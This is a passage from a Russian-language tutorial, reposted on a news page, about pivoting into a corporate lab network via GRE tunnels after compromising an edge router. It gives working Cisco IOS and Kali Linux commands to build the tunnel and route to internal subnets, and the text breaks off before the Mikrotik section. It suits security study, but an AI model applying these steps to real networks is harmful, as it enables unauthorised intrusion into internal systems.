Категория > Новости > Pivoting District. Как работает GRE-пивотинг поверх сетевого оборудования - «Новости»

Pivoting District. Как работает GRE-пивотинг поверх сетевого оборудования - «Новости»

25-01-2023, 00:01. Автор: Goldman

документе RFC.

Лабораторная сеть

В качестве лабораторного стенда выступит сеть, изображенная на схеме.

Топология лабораторной сети

Это типичная корпоративная сеть с тремя уровнями (уровень доступа, распределения и ядра). В качестве динамической маршрутизации используется протокол OSPF, для отказоустойчивости доступности шлюза — HSRP. Имеем четыре коммутатора уровня доступа и четыре сети VLAN со своей адресацией. Также подключен отдельный коммутатор уровня распределения, за ним сеть 192.168.20.0/24.

В качестве Edge Router будут выступать Cisco CSR и Mikrotik CHR v. 6.49.6.

С атакующей стороны машина с Kali Linux и публичным IP-адресом — для примера атаки из интернета. Предположим, что атакующий каким‑то образом получил доступ к панели управления пограничным маршрутизатором, поскольку продемонстрировать мы хотим пивотинг, а это, как известно, один из шагов во время постэксплуатации.

L3 GRE VPN поверх Cisco IOS

Продемонстрирую небольшой пример организации L3-туннеля во внутреннюю сеть, которая находится за самим пограничным роутером. Вообще, принципы настройки GRE не отличаются у всех вендоров сетевого оборудования, вопрос лишь в разном синтаксисе. Давай для начала посмотрим, как настраивать Cisco.

Конфигурация GRE в Cisco IOS включает следующее:

создание логического интерфейса;
указание режима, в котором будет работать туннель (GRE);
назначение адреса на интерфейс (здесь возьмем адреса 172.16.0.1 для Kali и 172.16.0.2 для Cisco CSR);
задание адреса источника 212.100.144.100;
задание адреса назначения 100.132.55.100.

EdgeGW(config)# interface tunnel 1
EdgeGW(config-if)# tunnel mode gre ip
EdgeGW(config-if)# ip address 172.16.0.2 255.255.255.0
EdgeGW(config-if)# tunnel source 212.100.144.100
EdgeGW(config-if)# tunnel destination 100.132.55.100

Теперь черед второй стороны GRE-туннеля. В нашем случае этой «второй стороной» будет хост атакующего. Linux прекрасно поддерживает работу с GRE при наличии необходимого модуля ядра ip_gre. А он есть почти везде.

Здесь шаги такие:

импорт модуля ядра;
создание логического интерфейса с указанием типа, адресов источника и назначения;
назначение адреса на логическом интерфейсе;
включение интерфейса.

c4s73r@kali:~$ sudo ip link add name evilgre type gre local 100.132.55.100 remote 212.100.144.100
c4s73r@kali:~$ sudo ip addr add 172.16.0.1/24 dev evilgre
c4s73r@kali:~$ sudo ip link set evilgre up

Проверим работу туннеля через пинг до туннельного интерфейса Cisco CSR.

Пинг атакующего до второй стороны туннеля

Пинг от Cisco CSR

Посмотрим на таблицу маршрутизации, добавим некоторые маршруты до подсетей, чтобы проверить доступность.

Таблица маршрутизации пограничного роутера Cisco CSR

Прописываем маршруты до целевых подсетей. Адресом шлюза в данном случае будет адрес логического GRE-интерфейса роутера Cisco CSR — 172.16.0.2.

c4s73r@kali:~$ sudo route add -net10.10.110.0 netmask 255.255.255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net10.10.140.0 netmask 255.255.255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net10.10.210.0 netmask 255.255.255.0 gw 172.16.0.2
c4s73r@kali:~$ sudo route add -net192.168.20.0 netmask 255.255.255.0 gw 172.16.0.2

Результаты сканирования SSH внутренней инфраструктуры

Примерно так будет выглядеть пакет с инкапсуляцией, если атакующий взаимодействует с внутренней сетью (ICMP, на примере внутренней подсети назначения 192.168.20.0/24).

L3 GRE VPN поверх RouterOS

Теперь продемонстрирую пример на оборудовании Mikrotik. Здесь абсолютно те же принципы настройки, разница лишь в синтаксисе и иерархии расположения сущностей (интерфейсы, IP-адресация и так далее).

info

Здесь приведены команды именно для RouterOS v. 6.

Перейти обратно к новости